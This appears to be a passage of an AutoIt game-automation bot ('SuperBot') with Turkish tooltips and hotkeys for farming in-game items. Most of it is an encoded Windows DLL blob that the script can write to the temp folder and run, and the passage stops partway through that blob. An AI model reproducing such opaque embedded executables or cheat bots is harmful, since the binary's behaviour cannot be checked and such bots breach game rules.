Global Const $cdds_itempreerase = 65539
Global Const $cdds_itemposterase = 65540
Global Const $cdds_subitem = 131072
Global Const $cdis_selected = 1
Global Const $cdis_grayed = 2
Global Const $cdis_disabled = 4
Global Const $cdis_checked = 8
Global Const $cdis_focus = 16
Global Const $cdis_default = 32
Global Const $cdis_hot = 64
Global Const $cdis_marked = 128
Global Const $cdis_indeterminate = 256
Global Const $cdis_showkeyboardcues = 512
Global Const $cdis_nearhot = 1024
Global Const $cdis_othersidehot = 2048
Global Const $cdis_drophilited = 4096
Global Const $cdrf_dodefault = 0
Global Const $cdrf_newfont = 2
Global Const $cdrf_skipdefault = 4
Global Const $cdrf_notifypostpaint = 16
Global Const $cdrf_notifyitemdraw = 32
Global Const $cdrf_notifysubitemdraw = 32
Global Const $cdrf_notifyposterase = 64
Global Const $cdrf_doerase = 8
Global Const $cdrf_skippostpaint = 256
Global Const $gui_ss_default_gui = BitOR($ws_minimizebox, $ws_caption, $ws_popup, $ws_sysmenu)
HotKeySet("{end}", "Get_Exit")
HotKeySet("{F1}", "stop")
HotKeySet("{F2}", "Pause")
HotKeySet("{F3}", "pala")
HotKeySet("{F4}", "bilgi")
Global $paused
Global $bilgi

Func bilgi()
	$bilgi = NOT $bilgi
	While $bilgi
		ToolTip("Mor Kare ile Palladium , K1rm1z1 kare ile Kutu ,yarat1k vb.kesiniz -> Tu_lar = F1,K1rm1z1 kareyi,,F3 Mor Kareyi Yönlendir,Program1 Durdurmak için F2 tu_unu kullanabilirsiniz.", 0, 0)
	WEnd
	ToolTip("")
EndFunc

Func pause()
	$paused = NOT $paused
	While $paused
		Sleep(100)
		ToolTip("SuperBot Duraklat1ld1 Devam etmek için F2 tu_una bas1n1z", 0, 0)
	WEnd
	ToolTip("")
EndFunc

#Region
$mpos = MouseGetPos()

Func _uskindll($ltosave = False, $spath = @TempDir, $lexecute = False)
	Local $hfilehwnd, $bdata, $sfilename = $spath & "\USkinDLL.dll"
	$bdata = "EL8ATVqQAAMAAACCBAAw//8AALgAOC0BAEAEOBkA8AAMDh8Aug4AtAnNIbgAAUzNIVRoaXMAIHByb2dyYW0AIGNhbm5vdCAAYmUgcnVuIGkAbiBET1MgbW+AZGUuDQ0KJASGAFHVieoVtOe5QQUD1ru4uRgCB7oEuQgCE+a5nbbnQLkycpq5MAAPMhByirm8AgeJufVRAgeduRQCB5sEB59hAgdSaWNoAU8Ns1AARQAATAEDAFcIkxdJBRPgAAIhQAsBCAAAsICEIIEACNAHAFB+CwAMEAcAAJCAAwAAEHGAAAAAAoOTAQCFAwD+sIAPgQ0DDwIVgweFAwMDIEihCwDoABpwnpgLANgBFIArcA6PqSAwpgsAGKC9RICICwBIkAusjAeS3fBVUFgwAgSAbYVLB2LtAwCAQDzACTHDNcBCwT8OosABzAnAF+AucnO8cmMBA8FLwUgBLaZBkv3KCcCgMj8APwA/AD8APwAhCwAzLjA3wX0hD"
	$bdata &= "QAJCAkazkJ1ewCV3VL7TwsAQQKewGnQCgAmEwAAcv+9+f+LRCQABIP4UHcTD7YAiAA0/ySNDCQA6RMDFSuX570Adwlfw4v/ICEABhccA93asWkAAQETAisWDZIAvIIBAMwfPa4AfQ3+DgAHgHUABegHUAoXrD8AAf//Y/8iBCYAoFnDXwiLTCQADIPK/yvQO9EAcwa4VxN7/34AeMMDwSgEiQEAM8BPv/cw94IAt2RmhdJ3Be4A/3YKaF+kv20A/yusjFNVi+wAav5oJCRgCAQQLJBkoeCSb38AAFCD7BQQB88AADFF+DPFiUXkAFNWV1CNRfBkAKOttbd3O4llAOiz0PaJdfwEANxqICKL+/+7ANtFCDxN3FGtALyDxAw7xn0HADLbiF3j6y40APP/70Hcfi4sAGjrIYtV7IsCAIsAM8k9/ffMAFBwwA+UaMHcADBVStsK3v4rAEzHRfz+/wCKAMONZXJN3okNAOEV/Lu9WV9eAFsa5D"
	$bdata &= "PNRix4AIvlXceHgpWHAB4Qi1TGUDkVAFzbYVFSYUX1AAoRlBgUJZtDAO1ZX0Zw4f0NAH+7fVOLXEZXAIt8aldT/xUAAAYDksBu+/b+AHUDX1vDVlAdAJDwhfZ0LTm1AO2/wf8YA8aDAOEPdhaNm3c7APBzEIPpAQ+3AB50/6Z481YCAHXwcgZeX0yAAGaLBmb32BvAAPvBx9ojxh5bAOlWi3Q4xsHoAAToLt+/i8zAAHTIagZRV/kEAF4I7nx4V9YCACwaX63iexyNAEE18A/BEErkAH+SARaK3/+LABBRi8iLQgT/ANBPaA793//bANeRoA5OUBDGANKDfgwAjU4MAHwUaze44DsGAHWY/rgBhJg6AMfORW/39otOAASaixJqAaJUAIv4hf9o6QxuAMcHDPyLRvRHAAQKXHBhC3Z2AMYQPI1P7A2/AH0FTUJix0dRAFNV5DGLXvSDAO4zvLTFEIkOAPW0bHi4rszMAANaAlW96DvdAH0"
	$bdata &= "30zo6auv+AAGsTrZvEFWsABT8IIlfBI1WAOLIAkhrd/A2ADp/CqAR3FaCALwQ8tsiTH+JACldW1nCBOfuADaL8WHD/w32AItI8IPoEDlQAAh9FVB+EbA1APOt2jn0UlCLAEcIjF/zurcpAEyewlx7AXdMAIPITZ+cyXWSAAVAAIVaU7hDAAx4W3Zf49oVAGX/4lbUtvFYAF7LCp5gS3QEAFHu+Z4Qt7hHAELpDIXbNxR1AA6BxaoevmujAFJvI3hYVtoUAElEiQd82xSrAP7/O3D4f9aJAHD0iwdWU8YEAAYsD1YJA0XFAGmCDMK4fyy+AK14DoN59MpBAPD2OHRMg3jiAGev3RZ6fR8oAPgAfdHHQUgAADussA1SX8YKAICDyccKSWF/ADTPhckIUKeLABcMhx4HVobPABCrRwHDv4pvAAPc0HAEO/J+AHDWwgFefq72AH/cCYkuWgN8AItACDvC3j3eAOx2726ufgcFAA3rAgPAJljC"
	$bdata &= "AIlES7EpbsP8AImeUOZ0CxtgALBoqxA3IEQfAOAgUXUfXMgjAOBfka3h3r49AE6hWQduC1JEANBpv1aNtgLlAKZIaRG9TLL2AOYcV1D4EwG/AEqUK1SO39f3AGsr0AvKfYDOALwFXItHhWjQAJ6LQQSh/qscANoGxWD42ceQAAzFx4L/C+4zAPaLA4t49Dv3AHweQvBQTyLVAO8jRMjWFF+DAJiM4IaKowiKAAgaQBjAdA33AIrVsPkdIgsrAM5Qx/QGP3gcAAPPUT8EjF/iAH2HPJXu/v0QAPkIB8072h14APR8HfkQ9l9eAF9LVCwR8g/vABgbDHhr62+fAP8wnCPAwRAQAAoBXgTFdBG/AHB8DeAIwg4IALLZv+0MZJZSADdVTAfmIGoAAANfwFyuVhxcAAwbKIs0zxaGAPCQVcH1UEBrACM3V1LGC9BWAIvLA4IPbd2wAGX3UFFqlXcoAF18G2hRpZNAAIsUC/AEDkiTAHOA8gf3N"
	$bdata &= "eAQANgon3SI3qrlAMpt6/xeVaQMAG0O7oefA1WLAGj06iv4uqA4APx2G3Jp+AxqABQ7/VLeR1D8AFZ3DY0MOFIxAOsIEzJS8K6NANBfSKmiUoS3AKATRhYA51+3ABbYuXTQ+/ZsALRWVVOXFz18AIxDbUYHo8IcACsbeRi11rQIAKBMzw9Ws5fPAHCNRgFG7kTVAHwXautSw0ulABAXXV8t7RYPAIxhB1a9GI00ANQDRWaTYdmJANPLu4BiwV46ACtX4KceXIHbAMM0DjD0UAPvAM0gBJcJWjUUAOsNX+3cB0bFAMMnvNnkMDRwADDWmwcU45WjAKFgICnpGHfhAJ8N8AeNFDhGAMwGUVJRA8V4AIccrOn4AwP4AAb4YMAx+iftAAxXFrjABAvVAEZfzWAd71xVAAd8G39F7adfAP8IMsC0IvfBAJD/2hov7duiAFZI8VaBdAlWAHbPsAHrhUrcAF5fer/m+eFNAFDgxDekqjvGAHRUqr"
	$bdata &= "evWIyAAF4MfDaLHhZ1ADBVq0I+YXWLAOiuWQMNHlhwAIPFti9dSEGLAHZjP8NR9ALrAAhMJwz7akMuAIR/QHUN+v89AJU++l9XxleNAHgBjWQkAIqMAK3Zt8OE0nX3ACt8QX9OCgMaAPmNDt5nigcKAHQ/3KFq/2hIAN6VJ8axqS9RAFZXM8RQaBBtAMDDMR/gJJVAAHkGGLJLHBgnANxeEVszySYPAJXB8AMHqQNPAKogrlih4FcqACi87A+LeZQnABAZKEwEuCyBABPf+Q4gAXIJAFxw6I8RYwWSAGdyWySPhsM/AAncQQ+SiyD/AOP5iTh4CB7kAOWNdwTRoHmQACi/t40gA4+3AFVYxnIcATwKAJnqVHDhuvCVAP8ALOssGAUTAMfTZ3HQa0e/AIXS/Q/iUsHfAOBx4XLnwlaNAHABigjfyHbYAKfJxl48xUEIAFLJKd+yCMlxAJiDCwcgICEOAGn69CD3wsccAMTyLoFgwUPrACN"
	$bdata &= "q6xZUUgpWAHCNf19d5IIRAMH9fzj35CAYAFOBFPEzSvfvAODiBgcYABSWABSqDZyDPgEWAGRPp8Qcdbo5ABQY3RqvEh/yIDl49DeKoKgCvAAWD7bAgxJHQwAF5PT/FYCDywD/O8d0SysGOwDDdEUp7IX7SwBY6Qb8g66JXAC8R/ILITKgGQBLhdsUjhKkQQDdpXYkmUp+DQAXEo8NnMaTQwDVAJ+y94H7DQD2gexIAgxDiQCEJEQaFaelQQCCZyRc76kKcAB/YIu0JGwkwgD0AEfbd6c6ZAABdS6NRvAfdQAJxYISAbx7hgBh2LoXRf0c9QA/AcZ348jAMAAB/SBG9I/zYQC3RHwdKSBW1gBBZWgTvEmOCwAioA+FiwAbDwAvA9LdjIcSTQAkb3RozjD9wQCNlG+NTwRS1wAYIhgR3O8AYQCvaJBmvw+PcgAGLFWzQNngdwA0FX8cz//rGABqOhFCMi5+wQB3dScEGov4jQBe8FOGLKsd"
	$bdata &= "uAAHJ41oECiJbADyeRZcYLwbAgCqWwF9jRMChwDrVEsNB/t0igBFLTpod4IRcgCBOJMB42IDQQAI3UtHGIpfYAALFART/9KN9AAllvg0TLBoUACWiBcXf3sAUQCNVBqLzIlkJAA4UreOMLPdnQA+DKz/swNQHwCInEbCg+4NvgAsDlwri0j0UQAxHDbnvgWebAAED4tF9FBVKwAbYCheq1dRCAAkexQXYsDylgCInFFeOJgXhgAsp9oGzrj9egCNOigwTPobaQA7BUCBBQSdVABj8ivMYUxTBgAPhAu0dAiu/gABEmL3Nu/4pwD9Q+7Fi/CD/gD/GOKzCI1OAQAdvg52RxhSBAAoOyUghAWCywDGhAe7x3hkSABRo0K66AEkHQCGfalRoXzHJACIA0u+nyyv0ACgQ8EuVOFROQBUBjsk+CQexQDbbXQhywgMWgDBfBvDErsQ4QDhcYUkXLOGwQCw2juj86PTFwAX9BoFOGcJWQAfJw9fB"
	$bdata &= "1ooCgDDt5wMHIMsCwAyKv6H71Qz9gDSjrz26wONSQAAhfZO62ynWwDwQDv8jeMOpgBuBLFtrHcQYwAkbhwtQBMEOAB4U3cZIkDcaQA4AD/oCjb/WQBAIB0761gU7ACAm1sc9VkZdgC4RYIJGKgEoQBUCgSfdCA7dAA0AmFEh+3mwAAKQLBQUbPvZwA6PPhUg8YBTACMSbK8zSloLwBPEhyDfE4ArADXIy4H37Y8UgB8GL4iwOXR2gA5uEA4ut++hQA+Z+4gUD22UQBIC6youOco0wD2d2zcO2LSBgC/bCDSATyNDACxgFw0wHHDGwCD6w2nSQa6tgCL6TQ+GIyQCwDWB4xMmgYHOwCPDmAEDsFCpgAdBWEkkwqC6QDFMWsdrpuBZACSNsAcBUQDlgCTTAL5uMJOWgAji4w1Ps+gVQDXHiREM8yocAC3AE+BxFQY+gDaq3AErl//gwB5IHTY5K7LlgBkai8hJsM/qwCNVPTsCBAk8wDhUA"
	$bdata &= "jj3VehCAAkDBpHHQkqmQC5FORGnDe69wD5i8Lfs2+ZRgDcet0MzhOz8wBFjwqBCBwpgwDHLQDco174KgD8g7ikfRagCAAANRP8oA3zdAB2rFDraEi+9gBAU+HtB6woAADDBLSUX/8/T9xvqJ0jG4uAfCa8AnQUYZgnx8Qm3bbRHaTThw1XwAxuURmxBIThoA6riuSCUB3faNflNkFvYBukUopYJQE+Hpqs/Exn3AwFITnqAGtEK4JA0lDLZIIVwTPAxb+YYA5kqFJEkglCVKOfyI5gFGhWoaEMAzmSQRh4HWhwpGo+Vo8FLHV5HrnDFTk4bXloCI/ZtrhaajeQA1c89gzJIZUMGAgQ0EyBgqwUZR1tBc1UUu1fzF6UDBBf+HUkovoeweQFLEYsmVvFimJkIhRDP6o45ES0Mww9HwoXPtnu2cRJ2NHf4H2ws//2xAV6Ctng2VwsNdkFTljY2Rvgu64w3RNQPSHZwdjxg8yJwMb+e0LbBtj"
	$bdata &= "J3urZyWcS3Hf3drzY02bbXw7ZyqEkLc48PvcW6DUwD4oBRiS8t7/HOd75z0jZfI7cyQ+3na91jRLUHok/bAbbVopFuqc9iB4EIFPemZ0LqU9cR4hMNzb4cSkAhzxq+xQ2VmofxLhaAAABdJToc8rjT8BR2RwkmWhbubQav6fc6wnd2EIczwhx2rUvvgCVjBeMbGijaMW9I/YYxQOLA51eP2CptxwEogTwJkUjcopPNAhcK5CPH7RYT1EwqlbvPcgQIbffiAzIECETuBBABC8SlMC7vyLkATIgtRhiQccZBL9OchDRFB8QtUgJhiFCFH9E00W0eN+o3zoRSRve2LYISGYjKB/fOOQikotomC4iuYjI+NEeRAU/tyjfBaIIF1jfIrmIpN6IuIDYJiy+yBvfeygMyVGBUIBLeAPZBLluYnjE5hQMiQiTH6YaH/K4MBhTVsMkGuRkQhgsuzl4jJ5hmKx1HXYY8ai7UiwPhBM2elDjgRs7lCi5"
	$bdata &= "IRdqBOcpvxcfi/AzibDID/dGQMESnGaIxBSsJ7xskVzG57phXFnhwAY9YhGevKI8UWfKyR5xFFYgK0Czz/rA3gJWojQ3D3yFwCR0hkBfrEi3JxyLUFOshzzkNAOUbFo84IpSgySvHLEGB7BNUhXXoAdwjfzvJKFJxSBbkCTkkkHO37hoEBgBGZILIFhm2CiYSj50QkMsHtiSQxQqeigB4L4f1jVBdT0YEIjI0kivsa/hIFcMZpLrkJ8YHNOwPQDcUZ27KKw8F5ACR/YgBgxvVSlQq/FaEAq0CioAHwEGplGwJV+4sClUg/JcgVZ2Sv3eSvc3bscGNITHhu/WLUzaEqj/alA8/NVMdEwNdBBl4lMSR7ziivfDFhN/Ap8AF8yLzl48L8RHhKeundGpHgqITzIqTP84Q/aL5RIergF2J+AtFhEt4zeLQATPLFSFAdwgeQVEwwkOS24fAR8AfhAah1cfD7aKvgEogL9ag/kZdwOkIMBK09wgC"
	$bdata &= "o15wv/BIEwM/h26BDvBdNZfK8HMQTDY/t8odwcQgQQCtBeNhYmBUzRIVzP/1ccm4I1ZBD6LM8wm6fwkhMQOoissdNr/BAcRjVYgVVIhdBSCW29NcujDuv8pfMn8UngL30HoBbAmwjP/jP37K+LsJHU4iUYEKDBQiU5AQLyF6cJqqlEIQMdG4W+V7hmJVkRMTHlmQFKNRm3aobcYHlAf9oM9kudQ8HY/dPQKhnqRoxmLDQpM97hGF4oV3FG/AviL4jf8PYkxi0ZAEnYLgDhodbEatA6GAbZAOlqnQ0GaTS4cAri93lqA7dwAAToAGJ4FsxT1AIw07ORJHBlXjAHDNHpHQrovCV9bXRcQWXhYRZ5HDBYeGto1/GZRA8NQPwo0IEQU/lWiH3Tig3/GeItPEIsEGQPLL4Dh/zYxM9I7xQ+UwiQGdTU7BSS8wQZbdg5RCTloASQ+8E76NjIbGsEMYuL76s+SdZNSzB58At7zahw8Ulbp8By8dn"
	$bdata &= "gcZsA9GvRoJMDDu8EgUv/X2MneOAkGHIauSMad/WQY6BziUlBRPqQEOLYd16u9zJ/wEJIMoDz6FTA6w8zB6BA9ImCotst1GXEkO/33g7eswzvoix0K7IPN/zktr4k/vpCxDHVDaABU/9OUiTV9Igh+JBh0MDBfAK28aJEGLNBLVjxUNB2BVsKs7Htsy6x/DXebfDShTzvIdggVEhAD0Dvdke71yg+CcKy/RHRG6bCT2Xf3/HQIOdMIdDbjCN8g5JJKd0DfJAEc2eMelzL6UMLh4AGz+QAD0TvC//5CfMAdqfvfVkHwSoPiLUjc4F59A2KHIIUkVU0BboyL6BY9Ahoh9lx9bB6F7BI4fR2hzTRonIfI2u2/LFrZADABV3U/i1U6gkwBSFEJNF9s/9DkLYt8V3RRD1N6LX8canQYOfsno8DG7oG+cHMLX131jYE/HVOiI/eL2MrtInZXoli5B9vzjTzzpav+fRmx/kSgSIkLiUN4Fom7E9T"
	$bdata &= "CUwga4gmJSx8oDIMMJY5BcNyDW2068kUAg4uASCnDu2ZwV1ZSLwaJwEZrfIEZjG/7W8uN2sYQIVigQjk+IA+VIw3EKgU3UN+wKuAPizBXi3gE362B+DnhkjxX/9ZN4jfw4F/8CLjKwhg8BGku7lvAIxQZ9ykEN144OBjiM0/TFBAQyKMU/Q/jD3uDDF4l+7//fwWltgaEZZ/f8y4Gc87dMOe+EDi1XNMMsFEVY5bs7D7gUEjKUokCpnDPAXLAnxwcGAjO0nabGFITr5+cZa8dDZeCnwingqxIrtgCdD/c0xadfsEzyccAvthIBAQQWCyKTQwIw1/KrwP4d/EDqZo7xl50CZgDGqjwUGW87JnfEIXbl4bJjCtQCC2263+MX/6LSBj30fbBAf50OUId7RbCdi6fgfuqAAqccr/tL94FvxF6jTR/A/YCVlVyrnArTwmr7d8D7lp31wlKcPW5bbBoZ0l1D2/TEApGMGVf0wcvGBxFQL60byVx"
	$bdata &= "kbBYCLj/fi7kFvz9/zPShdJ8OTvPfTWLhrA4A8KDeOR0BGxW8M2wBjkodBODmoO4PnzYMXGPJ4GWEOMVWNTAcx/ChAxyyAwgB3+E1Vd4M+073YkMdAbogdt5OQo4dHNV6NEDvAOWHMI+KCCKq66frDv1dJJs3E9kFA98fCQyzPAbdnaA50cXTM/kLIwI+NS50yoUfXXMjcnAqYQz4SWYKDiQBnxPxRIgGBxyBc9bn/gI7PDJhRzpi4W7M/9L44YXAH45M9uAD4yBvDr+w7u9K315i7W984M+AHVQRmuIH7g21eyJBkcMTS8oOjp8yRAsGs25D4USt0u4sSoihKkOyDSctmIwAiSeTxjATjowFPQkrHYhbdEfkix0ZOsJO6xQphGj/3U8jX0EjVgpPp43rkL8uyNBi05Ei1ZAUFGqDJ9wEOJDmwfwmR3p3C9QBIPrAXXP18fMdaOQhjSE+aWgHPJDm5UvfxgCIW8FXhTDkKoyv/pTcIk0w"
	$bdata &= "ehG8E61DzqNUFLvMzxGCGna07dDPoN+JBpKQEQ5kBMDJTqCkwP0XA+Utd0/rnYkLrL9cn05FDvFfDfHv7UDqhAqU3VYOW4EdEZGDAh+MC6jPRxgGkAHK286HIFCSMdeCHzS7Q5UEa5Rr4mOW/8wmrVfCAwE/F2qVgQ71aJ9PRxC74vU+H6A3/Y/8AqOGOsGiXDYjRxbA9sCYByKulN/Zo5QEv1n11mEMmwgMomQi14EA1wOhjdcIhiLdCx3Q8AvGAhOmEzFATvvfNPhYIG9kFuJzAhODAP1D76t4yI7+Q+PuRcIO8d9WN022F9AK8iNDEkDyQKIBEAUglVR758u/v2L1ytWjgxq0g+OVgFjx8a/B84Dw02BO810kDW0926zvFHD9Np83e3nZCMUnCb4K8dWEhnKf0g+PK2NpB27A7vVgzbUCJ4rzw/pfM6z/wd3SInFdSQamYPiBwPCwfgDHxsb/YP4BH0HuBPrDEEFuOfhgjPoKvt9Bt"
	$bdata &= "oUVmxQEmTyO9n9Pfg9GO2L6JyNFEAuA9IfPBigAlJytgHMCIvHK0BTwbvBMi3ySa6F3MrBoKpFIH4hguVh+DI3QoXJOc8rTrzw8fHZfN8QUklgQAoqclHWDLFwo/HgP41p1P27KZoe/epb/x8XwTbOBjri9jaWGP/SxxgdNtLhB9toZnJ55DWg1QzJw1+5K5NcUmBT9xAgSaxD+IP7KXwXQ93ALswfDLZqSJfIabwg6PY7xolufp8uHImCLCxSE1JXQKGxFe8r7GrOWPO23U9anwQoNca/XOgVDP/HAbjpPNRRGdvfvsUP42tU2jjsLSPsKmMnlweLzFD4uXZxOTk0YvzPB2D7oROEKk3hCqzF5dJonBzoPhUOaBwaCtZDQ46vUEHfoEZqvt7nZHRNU0xeOP4I5JeTv1s4y7CBa19dW9pwHOy//4tHGPfQqAHWpmrGddzKkwOvNWwIvDPGB0SGUBxNM2pzuDRh9CU8R/J0acObvwA6fIc"
	$bdata &= "5jQX/VY9n42djdHy/iy28fekQChn/U+LVYmPDAgDuAW5+VxtGSDoc9KrdDKAue9ddbZ95B8PSUI7YEhrefkkujSAEfwT8wxiIxjN/XoLRAIS/ncAKhRdHGAhBdBdhA2B+OfyNjqyzlbEG4Aud31kI2WE/Oez/kAeKjIi/8Yl0cZDmIQaLRMAfqTROvpG9GA+3+FcT04mg4fvrZTtccl6wioyHfzv8DRwaQlF7B9bgA1LANXiNmgf7CcAwPBZUrsUBfbDQA38deoFkuMEYS1pVyoM87hq4yzokFAxaiqpLLPSyJOMdjFqICuMqXDtafRhrR+IYFlYNV1EYQlzqzDSMK1baiJgwoAGkKKq0724PhPvQ/o1UslJcKF8YVjbH1DocL3l5YeuKCLAYK9xE14nGUBIvpGkLpDvsDVxnfFpfnAVSmZKQKoRBJhjIeP0sAsdTB/AwggL9RJNhsJFJVBsDhuHfApwIq7r7O3cO53pAiguqWoFXBIxv"
	$bdata &= "wBFASgx2jTSKCZEAi95RjUhOR5cLH4dXlsJeJ33jW8cfOOD7n5oIcjAjGFSMFIJptoTSGBcBD4CviRtNpbGAdQSuEHgco/EUA8dQUsmG6otUa0LF7AxSUOASGq/3PzzzpbDkadBzqBiSv0axYf+6HsEBdo3ZCwIGNFjhMcwnygR2hREhBLF1vtqbWFMbCOTHP4xAKoPMG0QA1ORADuRUyLyCUYDXUsufyBVMhk6bBPfd6qGXhL7oGHUlCQ89eejWudhYugxAfDz33PWE+8DSBEmbuD3kBAwqDYKun7vxC3vRQUwvbBABw+9cju2LQEBFfH14OA/9VxpIuvp0DoP+H30JWN0LtXq3ONB1HGoIh7wBRlDcN1Z0B3DTAQIRGu1I6d3j8zV6QDjvVueCdAYwM7Cdnk1qJ48GjRVHBO8AeIsfE5T/A/P4BRIddwuLhLfzfCjvQY6QCUxXag1J+t48QzIEB1//JT5UVdS6wBgPW8iH06mVOnUYP"
	$bdata &= "5wUGYANQFbiXV++V4wrGFNYGAZTKsnollqUBviwx0W8yvsCdRRnUFtesT/0TIZiU8ICMdwhZYI9pX9qDB/ocOUuTf8/7V1YtZZTI0CJQSHIfARc8QhkdCcgAnQiW4UfTHUcCFZT/9Xoi9jJ1cg4/19ei8NbXXROE6GeOTkkIf9qemkqsw//2NtbXFWso+FSZx8TjtoN3cdQ3tNft5wZSA49c8wmBGs9FC4DDAQwKievfQvlJnQFCAEkAV6YGPUOBns/Dt7lw6mHdQYXYFXDsCYwhiGYzNC+BYKrLh50LPagEHQmTb8N8ysmFYuAfMg5WGgP77A8jPwsiUYYJMXjZQyk41EgJC6uZeF5uZZQ625xAgzd1p1kX1lgrAszQPHGqHRBkO8WfhAx4YSrB/gQUn4sdYPTtOA04ldV4S78KsAz4oAMHKqXY6AHcOB21AiZguy7LT8jkYciGWhWahtVAVyc8OgfCUiX5oM1bF4QEJ2DBhy3LFEcJI"
	$bdata &= "Li6QTYZgK0oS6CRbklC6K0VBrvX1uFIiAyBVu3bNYpHxxcQHIBcB/Ii4qBf3ReFC+kMxQDIGcrOXhbymoEVlUwMFpCmhd3X15mVQ5WtA00Lf8+IKlIBkJ4qeQCiiGffIBgAJAFIh9ALiC5gB0AmUouhANILkAGHoh4IAUBHCUHXrfDhR+mAuSbdEIVFJFRQzQ3rLD9JxiBC2QqviBwO0m7iRDLepgBKGijaCIwJtw0BOcJ7yzNUkMkvNRvR18ojYEJTToG5Qr4Ao3QPCjTjFo0M8BfqOYIpIOB0gBGEHUO/FbiAcdlLUcwSJ5H8h9JkB3+oMTzSHAh73QjV7kK1vi5BoZ8i0hAbzCowhrasF4pUxBmjWRWFhV/B3OAXCCQoEfyTMkc0CBKyfNIniAeSQAiQ9KFUb4alOHiwkJYx1FJ/0V7yYP/fOh1OYP7PA+FmQrhGoe1eDS+8DokWeqfvVZoJgMANYXRF+4LARps0wjAFuIbtnVkgft"
	$bdata &= "UGHVceTTD+32NlqCuUmgjhaSIU09bfp+NhtwyUGgkL4PGGODTFmviISnj7BRqKD4Q6afFiQQkdQlq0ZhT0iJpM5suhfbwCLi0WEwQaBhu4P8YZPZDQAF0Xvcau6mdMN6SgeHIAYEvhXe7+Qt1CC8AQHQ+9otLhFQ7pTQuUgxGacaNNjv/0t0pRgRWEA5K9R8cKQ4BVggBRkYB9gOHRNtmNFVu7guXFCw0hE+B57zQAOw6UP8LdUG2PYDfS38NN4HlgIc4dBuLkVi22X+P5olgCl0rygFOBKadNKrtO5dUXDNdNf+oK7nG3iaczzA3vIuHDylIOIuXAcbAtLEMU70njoKqVni+Y4Aj6Vh+CqANhwAbOl1c/2oL+wsHuBwEpNPDCS9dXdJzrKGPUML4YjwWnAHCDXV/M5Jh7xxJKB//AGjSCx0C4NhWUXjwM3Wa3OhHNAyXkCP5En8B3MM6koMC2EOIdbYfhhNSk4zGxpG8fgPU8nV/8qav"
	$bdata &= "81dRUoFXeqO2g39fgX90JospIHaL/Fa/FIvpoar/9kBABHQJuPFwAr8FtLl1AgLsnwRB2hU8+HQC/+Aj0N8jP0qik5wFaIHsyM9U3FUDBBrQnA5XPgui84u8JBi6rHMJNXC9hZtQzOtxIj9WtdwfNKhXigkI60NobYL9YE/WUA8WkGpcUUJzhE/oTHQIBhQ4iI/Y6wN2999MAz5XdBdWN4wFi0BE66HPurYH4ziMcsJfW3WUQTi3a7YkL4ShfoS6cFJo3amHxWj0dlMXdfAufS51DDPeioO39laJRewE/Nl1fY0ZtSHxByeLRRSLTTJWUUKr7UVTOTwe9CGYwka65Rg6GVA9A9k7T3AdIbInMqFCoTmuVaAdTJrRWqhQEIuBDbjaBLW4rJPDfgn8CF8PhVcEKjPtOa48Ev6XYld+QDPbkBBBBFfC+c4mRo011+GuAF0CGKC+E1AD+6Hy/CMdg8UBiQeuw8BTD3YIT4D2C6w1Uum2lNjlU"
	$bdata &= "cwvwJyMVE4yAVAAjAKTjHSXQF98A1G+JSOVEGwE71gjlZPMvwVKsEglkrvLJEs4L1RqBtNkpHJMACgHk1L5Hh8PhIBOTEHgHBmpnDYIrUJwCAmTzFYmTwr8LwpOuktmlbDwjyYwL+BH5SRXyGonPUDQvxmpnPZqEC8wcLwRl4xULtCsEuDlQ0YqnBMB95CMDMlIkBSAFSQj3RUfgC9sFnLJSOUxkFwXsFK5ZKRIGDA0KSrXMBlvICAdKh++kAsCdGCEQ1AQRrpLRgzALwANSWbdSURgy/AvDn0hs8pD0ODVDwF0MJ1kpPJ0TMDIGk2gVE4y0i+0KEYQpEYql4wboJQckpHKSUcwhB85yUjl0HQgSHBUTjJSaCFJAFyMdJeMIpC/SB0kI5WTSiA0HuUks8tFJC8jRNAP4MlIFCRfXX9a6AbMAXTprEV44ddunwFssCoGUgfERpZbAz/nDFd4462PmAEUolBqzvUauVEmDUDYbyPO9uI6GF"
	$bdata &= "ODhT6h+wpWg+wsgzxcPI1iBLwgwMcHoIAOcmoSDbm0joEu0VxHLI1k9B10TLxQn9QxXBs80CfoiQ/OhckPAHjnJLb/iQZ1CZkrwtH4EOsDrndMCgw+WgNQAYAsfyO2Q34I8H0glhoPt00OZoP4tjb4+Qh3C79D0+fkXwpNgpgE+r0N2sla9vEl3fnAPxD2BF5fNLpmiX4CZgpdwFU4A3Y5rgv7v6YSF54PtlSFKIhUhgYRMxCVpyoEKdAWg19o/QXGRIYHhsE7x3LWVqNWADqApvjBVRC9dcKlw7/mgi8h3l9i23URMMPLkU8Hu+NqXbwtJLCDxiJQjBUvwoUmKNV0jUyfKCIEjGeGCNxI3TMA1xwXMlLq2nkq4oNwuEfD38APOzDqdRPlAPzDeOHeYwOjIt4HI7SacCtfEAlLLh9EKBxx0cFamJfYdZyIsu2K+APCBqM4iTfxngBwyB5MTSh1hKMYkY1IR1rsGd/aIHtKJsbOYqpsy+S"
	$bdata &= "eZ9qmBBIUDPupN5WuPAR9nJFS2BnDEwyjiwZKf2PrUFY3HFNXK8grz3YlPIbcxFlcNE6M78FM3xZTK1c2LVYILlGarSzJ99+VlEgFJzDmkY0okClYGqH/zG3bQCbMKivXLwLBdqH/MJEDsRBoMi5VxeKDxRP2VTU/wNVbGA84HSTDi0VojwqqCIIBWl1gdQB8s9BOgOLLDjAr+CvOf1HRBXRIcHStKHUVO7BHS4j50JCCYL1pboUkryhEK/h8x5n3+TWtxfkzkjTN6yjB/6UNKMUUjEZogIEOCCPjpomSLOwQOAaAQJCwDHftXsoBA6AYh0+JASt8MbVCPwEprIXSqhH/3aScKHwECjA78w+Pyx0ZhdsSKkzrBr8SMIzWrJ05MrEbSOhkHJiu1FO2M+BGoEhCtAdOUetrRyXx8ogYO34z7nTKjDp4Q03UFyvRA1MyNgqF531QQoJVbrcGt0Mr0FJVUXxS6yxkAlB0DuuB0apFWUCAPfSb"
